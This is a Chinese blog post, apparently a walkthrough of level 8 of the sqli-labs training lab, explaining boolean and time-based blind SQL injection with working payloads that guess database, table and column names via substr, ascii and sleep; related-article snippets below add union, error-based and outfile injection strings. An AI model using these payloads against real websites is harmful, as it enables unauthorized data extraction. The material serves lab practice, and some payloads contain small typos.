SQLI DUMB SERIES-8

最新推荐文章于 2024-06-06 11:11:56 发布
最新推荐文章于 2024-06-06 11:11:56 发布
阅读量756 收藏 3
点赞数
分类专栏: SQLI DUMB SERIES闯关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42395917/article/details/101227277
版权

SQLI DUMB SERIES-8思路

?id=1'--+

构造闭合发现没有回显

则我们使用盲注

盲注分为几种 

布尔型盲注

Length() //返回字符串长度

Substr() //取字符串 用法同下

mid() //mid(ABC,1,2)意为从ABC中的第一个字符开始取 取两个字符 则返回值为AB

left() //left(ABC,2)取字符串左边的几位 返回值为AB

right() //right(ABC,2)取字符串左边的几位 返回值为BC

ord()/ascii() //返回一个字符的ASCII码/返回一个数字对应ASCII码的字符

hex() //返回16进制数 hex编码

?id=1’ and mid(database(),1,8)=‘security’--+

时间型盲注

sleep(1) //睡1秒

交互时睡1秒

不交互时不延迟

if()函数 //判断后,true返回3,false返回4

if(1=1,3,4) 返回3

if(1=2,3,4) 返回4

?id=1’ and if(1=2,1,sleep(5))—+ //判断闭合

如果1=2正确 则睡眠5S 将1=2替换成SQL语句后可盲注

id=1’ and if((length(database()>1),sleep(4),0)--+ //增加1值来猜库名的长度

id 1’ and if((ascii(substr(database(),1,1)))>1),sleep(4),0)--+ //库名

id 1’ and if((ascii(substr((select column_name from information_schema. columns where TABLE_name = ‘your table’ and table_schema = 'your database’limit 0,1),1,1))>1),sleep(4),0)--+ //表名

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

通过改变盲注的ascii码来猜库名

i_momoe
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli labs 8 布尔盲注
Xiaoxiaoqiang_的博客
03-01 191
小学僧
SQLI DUMB SERIES-1-2
qq_43613144的博客
07-20 2378
安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag。现在就是去探索方法 第一题 1.提示输入ID,提示也有get,所以试试?id=1 再试试后面加’ 然后发现 ’ 没有被过滤,然后可以进行 回显成功 回显失败、 所以说此处存在注入点 2.用order by判断列数 第三栏位存在,第四栏位不存在,所以说这个表只有三列 3.爆库 联合查询注...
Web_SQL盲注_布尔盲注(下方有实操)(DAY5)
CHUNJIUJUN的博客
07-30 257
盲注常用函数: left(a,b)从左侧截取 a 的前 b 位 substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。 mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位 ascii(str)返回给定字符的ascii值,如 ascii("a")=97 ord()函数同 ascii(),将字符转为 ascii 值 length(str)返回给定字符串的长度,如 length("string")=6 substr(a,b,c)图中在当前mysql数据库的库...
sqli-labs 靶场 less-5、6 第五关和第六关:判断注入点、使用错误函数注入爆库名、updatexml()函数
最新发布
Superstacks超全栈
06-06 651
updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)意味着只有报错的时候才会在页面显示数据,那么我们通过使用报错注释函数获取数据。updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。XML_document:是string格式,为XML文档对象的名称。new_value:string格式,替换查找到的符合条件的数据。继续判断字段数量,当数字为3时没报错,得知为3个字段。输入正确不返回数据,则我们通过。
SQLI DUMB SERIES-3
imomoe的博客
09-23 1064
?id=1’) 构造闭合 ?id=1’) --+ 注释后面内容 ?id=1’) order by 4–+ 4报错 3不报错 故有3列 ?id=-1’) union all select 1,2,3 from users–+ 在将?id=1改为?id=-1 使其为逻辑不正确值不显示输出 使得输出位输出后面的语句 ?id=-1’) union all select 1,2,table_name...
SQL DUMB Series-3 & 4 通关过程分享(sql注入学习DAY2)
deja_vuDM的博客
06-10 1156
单引号加括号,双引号加括号
SQLI DUMB SERIES-1
imomoe的博客
09-23 2550
SQLI DUMB SERIES-1思路 首先判断要输入的是否为整型(整型不需要构造闭合 可以直接改变逻辑) ?id=1 and 1=1/?id=1 and 1=2 查看逻辑对错是否改变回显,判断数据库交互 逻辑错误不返回值 逻辑正确会返回值 真 假 ?id=-1’构造闭合 ?id=1’ and 1=1/?id=1’ and 1=2 查看逻辑对错是否改变回显,判断数据库交互 逻辑错误不返回值 逻辑...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master靶场
07-14
sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别,每个级别代表一种特定的SQL注入漏洞类型,帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。 在SQL注入攻击中...
SQLI DUMB SERIES-4
imomoe的博客
09-23 490
?id=1" 报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’ " 1" ") LIMIT 0,1’ at line 1 故")构造闭合 后续步骤同 SQLI DUMB ...
SQLI DUMB SERIES-7
weixin_34195364的博客
04-09 393
(1)查看PHP源代码 可以看见输入的id被一对单引号和两对圆括号包围 (2)根据提示:Dump into Outfile可知,此次攻击需要导出文件 (3)在第一关获取 @@datadir 读取数据库路径@@basedir MYSQL 获取安装路径 ?id=2' union select 1,@@datadir,@@basedir --+ (4)修改...
SQLI DUMB SERIES-13
weixin_33953384的博客
04-14 212
(1)检测闭合方式 通过 ') 闭合。 (2)尝试输入 admin')# 无回显。尝试报错注入, 爆表payload: admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 爆表名 爆users表的列 其他均与12关相同。 转载于:https://www.cnblogs.c...
SQLI DUMB SERIES-15
weixin_34335458的博客
04-14 127
(1)无论输入什么都没有回显,但是输入 admin'# 时会显示成功登录,说明闭合方式是单引号 (2)无回显,则使用盲注,可用用时间延迟攻击法。 测试时间延迟是否可行: uname=admin' and sleep(5) #&passwd=&submit=Submit 有明显延迟,测试成功。 (3)手工延迟注入与前面的手工注入相同,如爆库名 unam...
SQLI DUMB SERIES-2
imomoe的博客
09-23 846
SQLI DUMB SERIES-2思路 ?id=-1 union all select 1,database(),3 from users --+ ?id=-1 select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’–+ table_name:emails,...
sqli dumb series-1
03-16
sqli dumb series-1是一个SQL注入漏洞测试平台,用于测试网站是否存在SQL注入漏洞。它提供了一系列的测试用例,用户可以通过输入不同的参数来测试网站是否存在SQL注入漏洞。这个平台可以帮助网站管理员及时发现并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值